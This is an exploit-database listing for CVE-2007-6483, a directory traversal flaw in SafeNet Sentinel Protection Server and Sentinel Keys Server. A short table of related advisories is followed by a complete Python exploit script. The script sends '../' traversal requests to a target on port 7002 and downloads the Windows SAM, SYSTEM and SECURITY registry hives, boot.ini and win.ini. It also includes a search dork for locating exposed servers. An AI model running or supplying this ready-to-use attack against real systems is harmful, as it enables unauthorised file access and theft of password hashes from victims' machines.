SafeNet Sentinel Directory Traversal

🗓️ 20 May 2014 00:00:00Reported by Matt SchmidtType

packetstorm🔗 packetstormsecurity.com👁 86 Views

SafeNet Sentinel Directory Traversal exploit for SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.

Reporter	Title	Published	Views	Family All 16
0day.today	SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traver	20 May 201400:00	–	zdt
Tenable Nessus	Sentinel Protection Server < 7.4.1 Directory Traversal File Access	27 Nov 200700:00	–	nessus
Tenable Nessus	EAServer <= 6.3.1 Multiple Vulnerabilities	3 Jul 201300:00	–	nessus
ATTACKERKB	CVE-2007-6483	20 Dec 200720:46	–	attackerkb
Circl	CVE-2007-6483	19 May 201400:00	–	circl
CVE	CVE-2007-6483	20 Dec 200720:00	–	cve
Cvelist	CVE-2007-6483	20 Dec 200720:00	–	cvelist
Exploit DB	SafeNet Sentinel Protection Server 7.0 < 7.4 / Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal	19 May 201400:00	–	exploitdb
exploitpack	SafeNet Sentinel Protection Server 7.0 7.4 Sentinel Keys Server 1.0.3 1.0.4 - Directory Traversal	19 May 201400:00	–	exploitpack
ICS	ICONICS GENESIS (32 & 64) Vulnerabilities	6 Sep 201812:00	–	ics

`#!/usr/bin/python  
#  
# Exploit Title: SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal  
# Date: 04/28/2014  
# Exploit Author: Matt Schmidt (Syph0n)  
# Vendor Homepage: http://www.safenet-inc.com/  
# Software Link: http://c3.safenet-inc.com/downloads/2/1/21DAC8BE-72DE-4D32-85D4-6A1FC600581E/Sentinel%20Protection%20Installer%207.4.0.exe  
# Version: SafeNet Sentinel Protection Server 7.0.0 through 7.4.0 and Sentinel Keys Server 1.0.3  
# Tested on: Windows 7 and Windows XP SP2  
# CVE: CVE-2007-6483  
# Dork: intitle:"Sentinel Keys License Monitor"  
# Greets to norsec0de  
  
import sys, urllib2, argparse  
  
print '\n[+] SafeNet Sentinel Protection Server 7.0 - 7.4 Directory Traversal Exploit'  
print '[+] Written by Matt Schmidt (Syph0n)'  
print '[+] This script will download the registry hives, boot.ini and win.ini off the Target Windows box'  
print '[+] For Windows versions other than Windows XP you will have to append the --file option and specifiy a file\n'  
  
  
# Define Help Menu  
if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):  
print 'Usage:'  
print './exploit.py --host <target> [options]'  
print ' <host>: The victim host\n'  
print ' Options:'  
print ' --port The port the application is listening on (default: 7002)'  
print ' --file Path to the desired remote file (ex. windows/repair/sam) without starting slash\n\n'  
sys.exit(1)  
  
# Parse Arguments  
parser = argparse.ArgumentParser()  
parser.add_argument('--host', required = True)  
parser.add_argument('--port', type = int, default = 7002)  
parser.add_argument('--file')  
args = parser.parse_args()  
  
# Define Variables  
host = args.host  
port = args.port  
if args.file is not None :  
targetFile = [args.file]  
else:  
targetFile = ['windows/repair/default', 'windows/repair/sam', 'windows/repair/system', 'windows/repair/software', 'windows/repair/security', 'boot.ini', 'windows/win.ini']  
  
# Send Exploit  
print '[+] Sending exploit!'  
  
# Loop for multiple files  
for path in targetFile:  
# Define Directory Traversal path  
url = "http://" + host + ":" + str(port) + "/../../../../../../../../../../../../../../" + str(path)  
  
# Retrieve file(s)  
exploit = urllib2.urlopen(url)  
header = exploit.info()  
size = int(header.getheaders("Content-Length")[0])  
print "\n[+] Downloading: C:\%s ! Bytes: %s" % (path, size)  
filename = url.rsplit('/',1)  
with open(str(filename[1]), "wb") as contents:  
contents.write(exploit.read())  
print '\n[+] Done!\n'  
  
`

20 May 2014 00:00Current

6.5Medium risk

Vulners AI Score6.5

EPSS0.33352